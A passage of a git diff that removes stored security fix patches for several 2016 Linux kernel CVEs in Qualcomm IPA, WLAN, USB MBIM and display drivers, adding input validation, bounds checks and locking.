-+	mem->size = res;
- 	mem->size -= hdr_sz;
- 	mem->size = (mem->size + IPA_RT_TABLE_MEMORY_ALLIGNMENT) &
- 				~IPA_RT_TABLE_MEMORY_ALLIGNMENT;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-10234/3.18/0002.patch b/Patches/Linux_CVEs/CVE-2016-10234/3.18/0002.patch
deleted file mode 100644
index a9937f0e..00000000
--- a/Patches/Linux_CVEs/CVE-2016-10234/3.18/0002.patch
+++ /dev/null
@@ -1,382 +0,0 @@
-From d12370c7f3ecded1867fbd6b70ded35db55cab1d Mon Sep 17 00:00:00 2001
-From: Skylar Chang <chiaweic@codeaurora.org>
-Date: Wed, 19 Oct 2016 13:30:44 -0700
-Subject: msm: ipa: fix ioctl input param validation
-
-Fix input parameter validation in order to avoid
-device crash because of incorrect parameter in IPA driver.
-
-Change-Id: Icbdb05aeb9211665420a872d3453dbbd24fd347b
-CRs-Fixed: 1069060
-Acked-by: Ady Abraham <adya@qti.qualcomm.com>
-Signed-off-by: Skylar Chang <chiaweic@codeaurora.org>
----
- drivers/platform/msm/ipa/ipa_v2/ipa_flt.c | 36 ++++++++++++---
- drivers/platform/msm/ipa/ipa_v2/ipa_i.h   |  2 +-
- drivers/platform/msm/ipa/ipa_v2/ipa_nat.c | 77 ++++++++++++++++++++++++++++++-
- drivers/platform/msm/ipa/ipa_v2/ipa_rt.c  | 26 +++++++++--
- drivers/platform/msm/ipa/ipa_v3/ipa_nat.c | 76 ++++++++++++++++++++++++++++++
- 5 files changed, 205 insertions(+), 12 deletions(-)
-
-diff --git a/drivers/platform/msm/ipa/ipa_v2/ipa_flt.c b/drivers/platform/msm/ipa/ipa_v2/ipa_flt.c
-index c36ecfe..d6e563b 100644
---- a/drivers/platform/msm/ipa/ipa_v2/ipa_flt.c
-+++ b/drivers/platform/msm/ipa/ipa_v2/ipa_flt.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -235,7 +235,7 @@ static int ipa_generate_flt_hw_rule(enum ipa_ip_type ip,
-  * @ip: the ip address family type
-  * @hdr_sz: header size
-  *
-- * Returns:	0 on success, negative on failure
-+ * Returns:	size on success, negative on failure
-  *
-  * caller needs to hold any needed locks to ensure integrity
-  *
-@@ -373,7 +373,12 @@ static int ipa_generate_flt_hw_tbl_common(enum ipa_ip_type ip, u8 *base,
- 					((long)body &
- 					IPA_FLT_ENTRY_MEMORY_ALLIGNMENT));
- 		} else {
--			WARN_ON(tbl->sz == 0);
-+			if (tbl->sz == 0) {
-+				IPAERR("tbl size is 0\n");
-+				WARN_ON(1);
-+				goto proc_err;
-+			}
-+
- 			/* allocate memory for the flt tbl */
- 			flt_tbl_mem.size = tbl->sz;
- 			flt_tbl_mem.base =
-@@ -460,7 +465,12 @@ static int ipa_generate_flt_hw_tbl_common(enum ipa_ip_type ip, u8 *base,
- 						((long)body &
- 					IPA_FLT_ENTRY_MEMORY_ALLIGNMENT));
- 			} else {
--				WARN_ON(tbl->sz == 0);
-+				if (tbl->sz == 0) {
-+					IPAERR("tbl size is 0\n");
-+					WARN_ON(1);
-+					goto proc_err;
-+				}
-+
- 				/* allocate memory for the flt tbl */
- 				flt_tbl_mem.size = tbl->sz;
- 				flt_tbl_mem.base =
-@@ -534,8 +544,15 @@ static int ipa_generate_flt_hw_tbl_v1_1(enum ipa_ip_type ip,
- 	u8 *hdr;
- 	u8 *body;
- 	u8 *base;
-+	int res;
-+
-+	res = ipa_get_flt_hw_tbl_size(ip, &hdr_sz);
-+	if (res < 0) {
-+		IPAERR("ipa_get_flt_hw_tbl_size failed %d\n", res);
-+		return res;
-+	}
- 
--	mem->size = ipa_get_flt_hw_tbl_size(ip, &hdr_sz);
-+	mem->size = res;
- 	mem->size = IPA_HW_TABLE_ALIGNMENT(mem->size);
- 
- 	if (mem->size == 0) {
-@@ -720,6 +737,7 @@ static int ipa_generate_flt_hw_tbl_v2(enum ipa_ip_type ip,
- 	u32 *entr;
- 	u32 body_start_offset;
- 	u32 hdr_top;
-+	int res;
- 
- 	if (ip == IPA_IP_v4)
- 		body_start_offset = IPA_MEM_PART(apps_v4_flt_ofst) -
-@@ -756,7 +774,13 @@ static int ipa_generate_flt_hw_tbl_v2(enum ipa_ip_type ip,
- 		entr++;
- 	}
- 
--	mem->size = ipa_get_flt_hw_tbl_size(ip, &hdr_sz);
-+	res = ipa_get_flt_hw_tbl_size(ip, &hdr_sz);
-+	if (res < 0) {
-+		IPAERR("ipa_get_flt_hw_tbl_size failed %d\n", res);
-+		goto body_err;
-+	}
-+
-+	mem->size = res;
- 	mem->size -= hdr_sz;
- 	mem->size = IPA_HW_TABLE_ALIGNMENT(mem->size);
- 
-diff --git a/drivers/platform/msm/ipa/ipa_v2/ipa_i.h b/drivers/platform/msm/ipa/ipa_v2/ipa_i.h
-index ba16682..1e3c098 100644
---- a/drivers/platform/msm/ipa/ipa_v2/ipa_i.h
-+++ b/drivers/platform/msm/ipa/ipa_v2/ipa_i.h
-@@ -137,7 +137,7 @@
- 
- #define IPA_HW_TABLE_ALIGNMENT(start_ofst) \
- 	(((start_ofst) + 127) & ~127)
--#define IPA_RT_FLT_HW_RULE_BUF_SIZE	(128)
-+#define IPA_RT_FLT_HW_RULE_BUF_SIZE	(256)
- 
- #define IPA_HDR_PROC_CTX_TABLE_ALIGNMENT_BYTE 8
- #define IPA_HDR_PROC_CTX_TABLE_ALIGNMENT(start_ofst) \
-diff --git a/drivers/platform/msm/ipa/ipa_v2/ipa_nat.c b/drivers/platform/msm/ipa/ipa_v2/ipa_nat.c
-index 6202992..314b095 100644
---- a/drivers/platform/msm/ipa/ipa_v2/ipa_nat.c
-+++ b/drivers/platform/msm/ipa/ipa_v2/ipa_nat.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -25,6 +25,16 @@
- #define IPA_NAT_SHARED_MEMORY  1
- #define IPA_NAT_TEMP_MEM_SIZE 128
- 
-+enum nat_table_type {
-+	IPA_NAT_BASE_TBL = 0,
-+	IPA_NAT_EXPN_TBL = 1,
-+	IPA_NAT_INDX_TBL = 2,
-+	IPA_NAT_INDEX_EXPN_TBL = 3,
-+};
-+
-+#define NAT_TABLE_ENTRY_SIZE_BYTE 32
-+#define NAT_INTEX_TABLE_ENTRY_SIZE_BYTE 4
-+
- static int ipa_nat_vma_fault_remap(
- 	 struct vm_area_struct *vma, struct vm_fault *vmf)
- {
-@@ -568,6 +578,71 @@ int ipa2_nat_dma_cmd(struct ipa_ioc_nat_dma_cmd *dma)
- 		goto bail;
- 	}
- 
-+	for (cnt = 0; cnt < dma->entries; cnt++) {
-+		if (dma->dma[cnt].table_index >= 1) {
-+			IPAERR("Invalid table index %d\n",
-+				dma->dma[cnt].table_index);
-+			ret = -EPERM;
-+			goto bail;
-+		}
-+
-+		switch (dma->dma[cnt].base_addr) {
-+		case IPA_NAT_BASE_TBL:
-+			if (dma->dma[cnt].offset >=
-+				(ipa_ctx->nat_mem.size_base_tables + 1) *
-+				NAT_TABLE_ENTRY_SIZE_BYTE) {
-+				IPAERR("Invalid offset %d\n",
-+					dma->dma[cnt].offset);
-+				ret = -EPERM;
-+				goto bail;
-+			}
-+
-+			break;
-+
-+		case IPA_NAT_EXPN_TBL:
-+			if (dma->dma[cnt].offset >=
-+				ipa_ctx->nat_mem.size_expansion_tables *
-+				NAT_TABLE_ENTRY_SIZE_BYTE) {
-+				IPAERR("Invalid offset %d\n",
-+					dma->dma[cnt].offset);
-+				ret = -EPERM;
-+				goto bail;
-+			}
-+
-+			break;
-+
-+		case IPA_NAT_INDX_TBL:
-+			if (dma->dma[cnt].offset >=
-+				(ipa_ctx->nat_mem.size_base_tables + 1) *
-+				NAT_INTEX_TABLE_ENTRY_SIZE_BYTE) {
-+				IPAERR("Invalid offset %d\n",
-+					dma->dma[cnt].offset);
-+				ret = -EPERM;
-+				goto bail;
-+			}
-+
-+			break;
-+
-+		case IPA_NAT_INDEX_EXPN_TBL:
-+			if (dma->dma[cnt].offset >=
-+				ipa_ctx->nat_mem.size_expansion_tables *
-+				NAT_INTEX_TABLE_ENTRY_SIZE_BYTE) {
-+				IPAERR("Invalid offset %d\n",
-+					dma->dma[cnt].offset);
-+				ret = -EPERM;
-+				goto bail;
-+			}
-+
-+			break;
-+
-+		default:
-+			IPAERR("Invalid base_addr %d\n",
-+				dma->dma[cnt].base_addr);
-+			ret = -EPERM;
-+			goto bail;
-+		}
-+	}
-+
- 	size = sizeof(struct ipa_desc) * NUM_OF_DESC;
- 	desc = kzalloc(size, GFP_KERNEL);
- 	if (desc == NULL) {
-diff --git a/drivers/platform/msm/ipa/ipa_v2/ipa_rt.c b/drivers/platform/msm/ipa/ipa_v2/ipa_rt.c
-index 4ec43dd..8efc2d8 100644
---- a/drivers/platform/msm/ipa/ipa_v2/ipa_rt.c
-+++ b/drivers/platform/msm/ipa/ipa_v2/ipa_rt.c
-@@ -227,7 +227,7 @@ int __ipa_generate_rt_hw_rule_v2_6L(enum ipa_ip_type ip,
-  * @hdr_sz: header size
-  * @max_rt_idx: maximal index
-  *
-- * Returns:	0 on success, negative on failure
-+ * Returns:	size on success, negative on failure
-  *
-  * caller needs to hold any needed locks to ensure integrity
-  *
-@@ -356,7 +356,11 @@ static int ipa_generate_rt_hw_tbl_common(enum ipa_ip_type ip, u8 *base, u8 *hdr,
- 					      ((long)body &
- 					      IPA_RT_ENTRY_MEMORY_ALLIGNMENT));
- 		} else {
--			WARN_ON(tbl->sz == 0);
-+			if (tbl->sz == 0) {
-+				IPAERR("cannot generate 0 size table\n");
-+				goto proc_err;
-+			}
-+
- 			/* allocate memory for the RT tbl */
- 			rt_tbl_mem.size = tbl->sz;
- 			rt_tbl_mem.base =
-@@ -429,8 +433,15 @@ static int ipa_generate_rt_hw_tbl_v1_1(enum ipa_ip_type ip,
- 	u8 *base;
- 	int max_rt_idx;
- 	int i;
-+	int res;
- 
--	mem->size = ipa_get_rt_hw_tbl_size(ip, &hdr_sz, &max_rt_idx);
-+	res = ipa_get_rt_hw_tbl_size(ip, &hdr_sz, &max_rt_idx);
-+	if (res < 0) {
-+		IPAERR("ipa_get_rt_hw_tbl_size failed %d\n", res);
-+		goto error;
-+	}
-+
-+	mem->size = res;
- 	mem->size = (mem->size + IPA_RT_TABLE_MEMORY_ALLIGNMENT) &
- 				~IPA_RT_TABLE_MEMORY_ALLIGNMENT;
- 
-@@ -603,6 +614,7 @@ static int ipa_generate_rt_hw_tbl_v2(enum ipa_ip_type ip,
- 	int num_index;
- 	u32 body_start_offset;
- 	u32 apps_start_idx;
-+	int res;
- 
- 	if (ip == IPA_IP_v4) {
- 		num_index = IPA_MEM_PART(v4_apps_rt_index_hi) -
-@@ -632,7 +644,13 @@ static int ipa_generate_rt_hw_tbl_v2(enum ipa_ip_type ip,
- 		entr++;
- 	}
- 
--	mem->size = ipa_get_rt_hw_tbl_size(ip, &hdr_sz, &max_rt_idx);
-+	res = ipa_get_rt_hw_tbl_size(ip, &hdr_sz, &max_rt_idx);
-+	if (res < 0) {
-+		IPAERR("ipa_get_rt_hw_tbl_size failed %d\n", res);
-+		goto base_err;
-+	}
-+
-+	mem->size = res;
- 	mem->size -= hdr_sz;
- 	mem->size = (mem->size + IPA_RT_TABLE_MEMORY_ALLIGNMENT) &
- 				~IPA_RT_TABLE_MEMORY_ALLIGNMENT;
-diff --git a/drivers/platform/msm/ipa/ipa_v3/ipa_nat.c b/drivers/platform/msm/ipa/ipa_v3/ipa_nat.c
-index 67e9b39..e7e5cf1 100644
---- a/drivers/platform/msm/ipa/ipa_v3/ipa_nat.c
-+++ b/drivers/platform/msm/ipa/ipa_v3/ipa_nat.c
-@@ -24,6 +24,17 @@
- 
- #define IPA_NAT_TEMP_MEM_SIZE 128
- 
-+enum nat_table_type {
-+	IPA_NAT_BASE_TBL = 0,
-+	IPA_NAT_EXPN_TBL = 1,
-+	IPA_NAT_INDX_TBL = 2,
-+	IPA_NAT_INDEX_EXPN_TBL = 3,
-+};
-+
-+#define NAT_TABLE_ENTRY_SIZE_BYTE 32
-+#define NAT_INTEX_TABLE_ENTRY_SIZE_BYTE 4
-+
-+
- static int ipa3_nat_vma_fault_remap(
- 	 struct vm_area_struct *vma, struct vm_fault *vmf)
- {
-@@ -571,6 +582,71 @@ int ipa3_nat_dma_cmd(struct ipa_ioc_nat_dma_cmd *dma)
- 		goto bail;
- 	}
- 
-+	for (cnt = 0; cnt < dma->entries; cnt++) {
-+		if (dma->dma[cnt].table_index >= 1) {
-+			IPAERR("Invalid table index %d\n",
-+				dma->dma[cnt].table_index);
-+			ret = -EPERM;
-+			goto bail;
-+		}
-+
-+		switch (dma->dma[cnt].base_addr) {
-+		case IPA_NAT_BASE_TBL:
-+			if (dma->dma[cnt].offset >=
-+				(ipa3_ctx->nat_mem.size_base_tables + 1) *
-+				NAT_TABLE_ENTRY_SIZE_BYTE) {
-+				IPAERR("Invalid offset %d\n",
-+					dma->dma[cnt].offset);
-+				ret = -EPERM;
-+				goto bail;
-+			}
-+
-+			break;
-+
-+		case IPA_NAT_EXPN_TBL:
-+			if (dma->dma[cnt].offset >=
-+				ipa3_ctx->nat_mem.size_expansion_tables *
-+				NAT_TABLE_ENTRY_SIZE_BYTE) {
-+				IPAERR("Invalid offset %d\n",
-+					dma->dma[cnt].offset);
-+				ret = -EPERM;
-+				goto bail;
-+			}
-+
-+			break;
-+
-+		case IPA_NAT_INDX_TBL:
-+			if (dma->dma[cnt].offset >=
-+				(ipa3_ctx->nat_mem.size_base_tables + 1) *
-+				NAT_INTEX_TABLE_ENTRY_SIZE_BYTE) {
-+				IPAERR("Invalid offset %d\n",
-+					dma->dma[cnt].offset);
-+				ret = -EPERM;
-+				goto bail;
-+			}
-+
-+			break;
-+
-+		case IPA_NAT_INDEX_EXPN_TBL:
-+			if (dma->dma[cnt].offset >=
-+				ipa3_ctx->nat_mem.size_expansion_tables *
-+				NAT_INTEX_TABLE_ENTRY_SIZE_BYTE) {
-+				IPAERR("Invalid offset %d\n",
-+					dma->dma[cnt].offset);
-+				ret = -EPERM;
-+				goto bail;
-+			}
-+
-+			break;
-+
-+		default:
-+			IPAERR("Invalid base_addr %d\n",
-+				dma->dma[cnt].base_addr);
-+			ret = -EPERM;
-+			goto bail;
-+		}
-+	}
-+
- 	size = sizeof(struct ipa3_desc) * NUM_OF_DESC;
- 	desc = kzalloc(size, GFP_KERNEL);
- 	if (desc == NULL) {
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-10235/qcacld-2.0/0001.patch b/Patches/Linux_CVEs/CVE-2016-10235/qcacld-2.0/0001.patch
deleted file mode 100644
index 2389d8b9..00000000
--- a/Patches/Linux_CVEs/CVE-2016-10235/qcacld-2.0/0001.patch
+++ /dev/null
@@ -1,35 +0,0 @@
-From 5bb0059243515ecdac138cfdb4cee7259bbd0bbc Mon Sep 17 00:00:00 2001
-From: Subrat Dash <sdash@qti.qualcomm.com>
-Date: Wed, 3 Aug 2016 16:47:39 +0530
-Subject: qcacld-2.0: Fix VHT-80 IBSS stops beaconing
-
-A STA entry is created for each peer joining
-the network to take care of the peer specific
-capabilities.
-
-The VDEV need not be reconfigured for IBSS peer
-with different channel width joining the network.
-
-Change-Id: Iec6ec5d2b510b84538f4e5300b3f1c5cc63b334d
-CRs-Fixed: 1046409
----
- CORE/MAC/src/pe/sch/schBeaconProcess.c | 3 ++-
- 1 file changed, 2 insertions(+), 1 deletion(-)
-
-diff --git a/CORE/MAC/src/pe/sch/schBeaconProcess.c b/CORE/MAC/src/pe/sch/schBeaconProcess.c
-index a28f2be..4ed8aea 100644
---- a/CORE/MAC/src/pe/sch/schBeaconProcess.c
-+++ b/CORE/MAC/src/pe/sch/schBeaconProcess.c
-@@ -465,7 +465,8 @@ static void __schBeaconProcessForSession( tpAniSirGlobal      pMac,
-             sendProbeReq = TRUE;
-     }
- 
--    if ( psessionEntry->htCapability && pBeacon->HTInfo.present )
-+    if (psessionEntry->htCapability && pBeacon->HTInfo.present &&
-+                                 (!LIM_IS_IBSS_ROLE(psessionEntry)))
-     {
-         limUpdateStaRunTimeHTSwitchChnlParams( pMac, &pBeacon->HTInfo, bssIdx,psessionEntry);
-     }
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-10236/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-10236/ANY/0001.patch
deleted file mode 100644
index 905e786c..00000000
--- a/Patches/Linux_CVEs/CVE-2016-10236/ANY/0001.patch
+++ /dev/null
@@ -1,41 +0,0 @@
-From b8199c2b852f1e23c988e10b8fbb8d34c98b4a1c Mon Sep 17 00:00:00 2001
-From: Arumuga Durai A <cadurai@codeaurora.org>
-Date: Tue, 27 Dec 2016 19:50:06 +0530
-Subject: USB: gadget: mbim: Avoid copying uninitialized data to userspace
-
-A race condition bug in function 'mbim_bind_config' allows to
-change 'mbim->xport' type to invalid value. This allows
-mbim_ioctl() to copy the uninitialized data to userspace. Fix
-this by avoiding copy_to_user() call when transport type is invalid.
-
-Change-Id: If8e8b6d4e2c347e1aff529bed0a798128eaea07c
-CRs-Fixed: 1102418
-Signed-off-by: Arumuga Durai A <cadurai@codeaurora.org>
----
- drivers/usb/gadget/function/f_mbim.c | 3 ++-
- 1 file changed, 2 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/usb/gadget/function/f_mbim.c b/drivers/usb/gadget/function/f_mbim.c
-index 717ee23..84c0066 100644
---- a/drivers/usb/gadget/function/f_mbim.c
-+++ b/drivers/usb/gadget/function/f_mbim.c
-@@ -2030,7 +2030,7 @@ static long mbim_ioctl(struct file *fp, unsigned cmd, unsigned long arg)
- 		default:
- 			ret = -ENODEV;
- 			pr_err("unknown transport\n");
--			break;
-+			goto fail;
- 		}
- 
- 		ret = copy_to_user((void __user *)arg, &info,
-@@ -2046,6 +2046,7 @@ static long mbim_ioctl(struct file *fp, unsigned cmd, unsigned long arg)
- 		ret = -EINVAL;
- 	}
- 
-+fail:
- 	mbim_unlock(&mbim->ioctl_excl);
- 
- 	return ret;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-10283/qcacld-2.0/0001.patch b/Patches/Linux_CVEs/CVE-2016-10283/qcacld-2.0/0001.patch
deleted file mode 100644
index 83db6b71..00000000
--- a/Patches/Linux_CVEs/CVE-2016-10283/qcacld-2.0/0001.patch
+++ /dev/null
@@ -1,42 +0,0 @@
-From 93863644b4547324309613361d70ad9dc91f8dfd Mon Sep 17 00:00:00 2001
-From: SaidiReddy Yenuga <saidir@codeaurora.org>
-Date: Tue, 14 Feb 2017 16:00:57 +0530
-Subject: qcacld-2.0: Trim operation classes to max supported in change station
-
-Operation classes supported can be controlled by user, which can
-be sent greater than the max supported operations. This results
-in stack overflow in change station command.
-
-Add check to validate operations supported param given by user
-and if it exceeds max supported value, set it to max supported
-value.
-
-CRs-Fixed: 2002052
-Change-Id: Idd3a35e38b091546a17d7ec6329f19429e5c289c
----
- CORE/HDD/src/wlan_hdd_cfg80211.c | 9 +++++++++
- 1 file changed, 9 insertions(+)
-
-diff --git a/CORE/HDD/src/wlan_hdd_cfg80211.c b/CORE/HDD/src/wlan_hdd_cfg80211.c
-index 8fc43a7..f82f258 100644
---- a/CORE/HDD/src/wlan_hdd_cfg80211.c
-+++ b/CORE/HDD/src/wlan_hdd_cfg80211.c
-@@ -13809,6 +13809,15 @@ static int __wlan_hdd_change_station(struct wiphy *wiphy,
-                           "%s: After removing duplcates StaParams.supported_channels_len: %d",
-                           __func__, StaParams.supported_channels_len);
-             }
-+            if (params->supported_oper_classes_len >
-+                SIR_MAC_MAX_SUPP_OPER_CLASSES) {
-+                VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_INFO,
-+                          "received oper classes:%d, resetting it to max supported %d",
-+                          params->supported_oper_classes_len,
-+                          SIR_MAC_MAX_SUPP_OPER_CLASSES);
-+                params->supported_oper_classes_len =
-+                    SIR_MAC_MAX_SUPP_OPER_CLASSES;
-+            }
-             vos_mem_copy(StaParams.supported_oper_classes,
-                          params->supported_oper_classes,
-                          params->supported_oper_classes_len);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-10283/qcacld-3.0/0002.patch b/Patches/Linux_CVEs/CVE-2016-10283/qcacld-3.0/0002.patch
deleted file mode 100644
index 37d269c3..00000000
--- a/Patches/Linux_CVEs/CVE-2016-10283/qcacld-3.0/0002.patch
+++ /dev/null
@@ -1,43 +0,0 @@
-From d60a5839ba987e2c9d365fef950cae0c9ad11010 Mon Sep 17 00:00:00 2001
-From: SaidiReddy Yenuga <saidir@codeaurora.org>
-Date: Tue, 21 Feb 2017 13:05:26 +0530
-Subject: qcacld-3.0: Trim operation classes to max supported in change station
-
-qcacld-2.0 to qcacld-3.0 Propagation.
-
-Operation classes supported can be controlled by user, which can
-be sent greater than the max supported operations. This results
-in stack overflow in change station command.
-
-Add check to validate operations supported param given by user
-and if it exceeds max supported value, set it to max supported
-value.
-
-CRs-Fixed: 2002052
-Change-Id: Idd3a35e38b091546a17d7ec6329f19429e5c289c
----
- core/hdd/src/wlan_hdd_cfg80211.c | 8 ++++++++
- 1 file changed, 8 insertions(+)
-
-diff --git a/core/hdd/src/wlan_hdd_cfg80211.c b/core/hdd/src/wlan_hdd_cfg80211.c
-index 2ac8896..8f13919 100644
---- a/core/hdd/src/wlan_hdd_cfg80211.c
-+++ b/core/hdd/src/wlan_hdd_cfg80211.c
-@@ -10513,6 +10513,14 @@ static int __wlan_hdd_change_station(struct wiphy *wiphy,
- 				hdd_notice("After removing duplcates StaParams.supported_channels_len: %d",
- 					  StaParams.supported_channels_len);
- 			}
-+			if (params->supported_oper_classes_len >
-+			    CDS_MAX_SUPP_OPER_CLASSES) {
-+				hdd_notice("received oper classes:%d, resetting it to max supported: %d",
-+					  params->supported_oper_classes_len,
-+					  CDS_MAX_SUPP_OPER_CLASSES);
-+				params->supported_oper_classes_len =
-+					CDS_MAX_SUPP_OPER_CLASSES;
-+			}
- 			qdf_mem_copy(StaParams.supported_oper_classes,
- 				     params->supported_oper_classes,
- 				     params->supported_oper_classes_len);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-10285/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-10285/ANY/0001.patch
deleted file mode 100644
index cc089c19..00000000
--- a/Patches/Linux_CVEs/CVE-2016-10285/ANY/0001.patch
+++ /dev/null
@@ -1,143 +0,0 @@
-From 67dfd3a65336e0b3f55ee83d6312321dc5f2a6f9 Mon Sep 17 00:00:00 2001
-From: Padmanabhan Komanduru <pkomandu@codeaurora.org>
-Date: Wed, 25 Jan 2017 16:38:48 +0530
-Subject: msm: mdss: handle synchronization issues during DSI debugfs
- read/write
-
-Handle race condition during read/write operations to DSI debugfs nodes
-related to DSI panel ON/OFF commands.
-
-Change-Id: I29c4ad74bf21d4cb5362565e902a682fe7263147
-Signed-off-by: Padmanabhan Komanduru <pkomandu@codeaurora.org>
----
- drivers/video/msm/mdss/mdss_dsi.c | 21 +++++++++++++++++++--
- 1 file changed, 19 insertions(+), 2 deletions(-)
-
-diff --git a/drivers/video/msm/mdss/mdss_dsi.c b/drivers/video/msm/mdss/mdss_dsi.c
-index 885d132..e6d9edc 100644
---- a/drivers/video/msm/mdss/mdss_dsi.c
-+++ b/drivers/video/msm/mdss/mdss_dsi.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2017, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -625,6 +625,7 @@ struct buf_data {
- 	char *string_buf; /* cmd buf as string, 3 bytes per number */
- 	int sblen; /* string buffer length */
- 	int sync_flag;
-+	struct mutex dbg_mutex; /* mutex to synchronize read/write/flush */
- };
- 
- struct mdss_dsi_debugfs_info {
-@@ -714,6 +715,7 @@ static ssize_t mdss_dsi_cmd_read(struct file *file, char __user *buf,
- 	char *bp;
- 	ssize_t ret = 0;
- 
-+	mutex_lock(&pcmds->dbg_mutex);
- 	if (*ppos == 0) {
- 		kfree(pcmds->string_buf);
- 		pcmds->string_buf = NULL;
-@@ -732,6 +734,7 @@ static ssize_t mdss_dsi_cmd_read(struct file *file, char __user *buf,
- 		buffer = kmalloc(bsize, GFP_KERNEL);
- 		if (!buffer) {
- 			pr_err("%s: Failed to allocate memory\n", __func__);
-+			mutex_unlock(&pcmds->dbg_mutex);
- 			return -ENOMEM;
- 		}
- 
-@@ -767,10 +770,12 @@ static ssize_t mdss_dsi_cmd_read(struct file *file, char __user *buf,
- 		kfree(pcmds->string_buf);
- 		pcmds->string_buf = NULL;
- 		pcmds->sblen = 0;
-+		mutex_unlock(&pcmds->dbg_mutex);
- 		return 0; /* the end */
- 	}
- 	ret = simple_read_from_buffer(buf, count, ppos, pcmds->string_buf,
- 				      pcmds->sblen);
-+	mutex_unlock(&pcmds->dbg_mutex);
- 	return ret;
- }
- 
-@@ -782,6 +787,7 @@ static ssize_t mdss_dsi_cmd_write(struct file *file, const char __user *p,
- 	int blen = 0;
- 	char *string_buf;
- 
-+	mutex_lock(&pcmds->dbg_mutex);
- 	if (*ppos == 0) {
- 		kfree(pcmds->string_buf);
- 		pcmds->string_buf = NULL;
-@@ -793,6 +799,7 @@ static ssize_t mdss_dsi_cmd_write(struct file *file, const char __user *p,
- 	string_buf = krealloc(pcmds->string_buf, blen + 1, GFP_KERNEL);
- 	if (!string_buf) {
- 		pr_err("%s: Failed to allocate memory\n", __func__);
-+		mutex_unlock(&pcmds->dbg_mutex);
- 		return -ENOMEM;
- 	}
- 
-@@ -802,6 +809,7 @@ static ssize_t mdss_dsi_cmd_write(struct file *file, const char __user *p,
- 	string_buf[blen] = '\0';
- 	pcmds->string_buf = string_buf;
- 	pcmds->sblen = blen;
-+	mutex_unlock(&pcmds->dbg_mutex);
- 	return ret;
- }
- 
-@@ -812,8 +820,12 @@ static int mdss_dsi_cmd_flush(struct file *file, fl_owner_t id)
- 	char *buf, *bufp, *bp;
- 	struct dsi_ctrl_hdr *dchdr;
- 
--	if (!pcmds->string_buf)
-+	mutex_lock(&pcmds->dbg_mutex);
-+
-+	if (!pcmds->string_buf) {
-+		mutex_unlock(&pcmds->dbg_mutex);
- 		return 0;
-+	}
- 
- 	/*
- 	 * Allocate memory for command buffer
-@@ -826,6 +838,7 @@ static int mdss_dsi_cmd_flush(struct file *file, fl_owner_t id)
- 		kfree(pcmds->string_buf);
- 		pcmds->string_buf = NULL;
- 		pcmds->sblen = 0;
-+		mutex_unlock(&pcmds->dbg_mutex);
- 		return -ENOMEM;
- 	}
- 
-@@ -850,6 +863,7 @@ static int mdss_dsi_cmd_flush(struct file *file, fl_owner_t id)
- 			pr_err("%s: dtsi cmd=%x error, len=%d\n",
- 				__func__, dchdr->dtype, dchdr->dlen);
- 			kfree(buf);
-+			mutex_unlock(&pcmds->dbg_mutex);
- 			return -EINVAL;
- 		}
- 		bp += sizeof(*dchdr);
-@@ -861,6 +875,7 @@ static int mdss_dsi_cmd_flush(struct file *file, fl_owner_t id)
- 		pr_err("%s: dcs_cmd=%x len=%d error!\n", __func__,
- 				bp[0], len);
- 		kfree(buf);
-+		mutex_unlock(&pcmds->dbg_mutex);
- 		return -EINVAL;
- 	}
- 
-@@ -873,6 +888,7 @@ static int mdss_dsi_cmd_flush(struct file *file, fl_owner_t id)
- 		pcmds->buf = buf;
- 		pcmds->blen = blen;
- 	}
-+	mutex_unlock(&pcmds->dbg_mutex);
- 	return 0;
- }
- 
-@@ -887,6 +903,7 @@ struct dentry *dsi_debugfs_create_dcs_cmd(const char *name, umode_t mode,
- 				struct dentry *parent, struct buf_data *cmd,
- 				struct dsi_panel_cmds ctrl_cmds)
- {
-+	mutex_init(&cmd->dbg_mutex);
- 	cmd->buf = ctrl_cmds.buf;
- 	cmd->blen = ctrl_cmds.blen;
- 	cmd->string_buf = NULL;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-10286/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-10286/ANY/0001.patch
deleted file mode 100644
index 678c2dec..00000000
--- a/Patches/Linux_CVEs/CVE-2016-10286/ANY/0001.patch
+++ /dev/null
@@ -1,50 +0,0 @@
-From 5d30a3d0dc04916ddfb972bfc52f8e636642f999 Mon Sep 17 00:00:00 2001
-From: Veera Sundaram Sankaran <veeras@codeaurora.org>
-Date: Fri, 11 Nov 2016 12:01:34 -0800
-Subject: msm: mdss: avoid removing wrong multirect on validate failures
-
-During atomic commit - validate failures, the newly allocated
-pipes and pipes taken from the destroy list are cleaned up.
-Currently pipe ndx is checked which can lead to cleaning up
-the already in use multirect instead of the rect allocated
-in the current validate. Add checks to include checking based
-on multirect to avoid such cases.
-
-Change-Id: I7f8fb6630314cdc523490e28d90dd3776bdfeada
-Signed-off-by: Veera Sundaram Sankaran <veeras@codeaurora.org>
----
- drivers/video/fbdev/msm/mdss_mdp_layer.c | 12 ++++++++----
- 1 file changed, 8 insertions(+), 4 deletions(-)
-
